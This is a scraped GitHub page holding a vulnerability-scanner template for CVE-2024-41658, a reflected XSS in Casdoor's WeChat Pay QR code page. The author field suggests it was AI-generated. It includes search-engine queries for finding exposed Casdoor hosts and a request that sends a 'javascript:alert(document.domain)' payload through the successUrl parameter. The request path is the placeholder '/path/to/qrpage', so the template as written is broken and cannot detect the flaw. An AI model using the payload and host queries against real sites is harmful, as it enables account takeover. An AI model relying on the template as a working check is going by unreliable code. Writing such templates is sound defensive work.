-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2024-41658.yaml
40 lines (37 loc) · 1.35 KB
/
CVE-2024-41658.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: CVE-2024-41658
info:
name: Reflected XSS in Casdoor WeChat Pay QR Code Page
author: ProjectDiscoveryAI
severity: medium
description: |
Casdoor 1.577.0 and earlier is vulnerable to reflected XSS via the successUrl parameter in the WeChat Pay QR code page. This vulnerability can lead to account takeover when the crafted link is used after a successful payment.
impact: |
Successful exploitation could lead to unauthorized access to sensitive information or account takeover.
remediation: |
Implement proper input validation and output encoding to prevent XSS attacks.
reference:
- https://github.com/casdoor/casdoor/blob/v1.577.0/web/src/QrCodePage.js
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-41658
cwe-id: CWE-79
epss-score: 0.00046
epss-percentile: 0.18638
cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
metadata:
vendor: casbin
product: casdoor
shodan-query: http.title:"Casdoor"
fofa-query: title="casdoor"
google-query: intitle:"casdoor"
http:
- method: GET
path:
- "{{BaseURL}}/path/to/qrpage?successUrl=javascript:alert(document.domain)"
matchers:
- type: word
words:
- "javascript:alert(document.domain)"
part: body